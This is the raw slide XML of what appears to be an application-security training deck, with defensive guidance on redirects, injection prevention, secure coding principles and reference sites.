              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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46</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41930011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 y="0"/>
            <a:ext cx="6934200" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing –Un-validated Redirects and Forwards </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1268760"/>
            <a:ext cx="8208912" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Avoid using redirects and forwards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Don’t involve user parameters in calculating the destination</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Ensure that the supplied value is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>authorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for the user.</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Table map</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ESAPI to override </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sendRedirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</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47</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287648552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Footer Placeholder 2"/>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dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2744153"/>
            <a:ext cx="8915400" cy="2152650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82124" tIns="41061" rIns="82124" bIns="41061" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="http://www.theperfectfuture.com/images/who_we_are.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2743200"/>
            <a:ext cx="3370609" cy="2148840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527050" y="3133725"/>
            <a:ext cx="4806950" cy="1362075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Holistic Approach to Application Security</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="6261100"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{55C5F7CD-489D-44B8-847B-0811A0E37738}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1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5364294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in Depth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security must be considered at –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Development (Yeah…it includes Testing !!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security must be considered at –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DB</a:t>
            </a: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49</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6139544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Injection Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Error 1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A1D00"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft OLE DB Provider for SQL Server error '80040e14'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A1D00"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unclosed quotation mark before the character string '51 ORDER BY some name’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A1D00"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/some directory/some_file.jsp, line 512</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="9A1D00"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Error 2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A1D00"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ODBC Error Code = S1000 (General error)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A1D00"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[Oracle][ODBC][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A1D00"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ora</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A1D00"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>]ORA-00933: SQL command not properly ended</a:t>
            </a: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5</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4891570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Coding Principles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Minimize Attack Surface Area</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establish Secure Defaults</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Principle of Least Privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Principle of Defense in Depth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fail Securely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Don’t trust services/inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Separation of Duties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Avoid Security by Obscurity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keep Security Simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fix security issues correctly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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50</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343349972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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>OSSTMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.osstmm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.owasp.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>OSVDB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://osvdb.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>CVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://cve.mitre.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Secunia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.secunia.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>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51</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863600" y="4265613"/>
            <a:ext cx="7772400" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.aujas.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="2133600"/>
            <a:ext cx="7772400" cy="1500188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thank you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="Footer Placeholder 5"/>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latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39941" name="Slide Number Placeholder 6"/>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A7DC77-3294-467C-9FB3-0CBC3AA5DA17}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>52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Preventing From Injection Attacks </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1271736"/>
            <a:ext cx="8229600" cy="5253608"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use safe API that avoid use of the interpreter or provides a parameterized interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escape special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
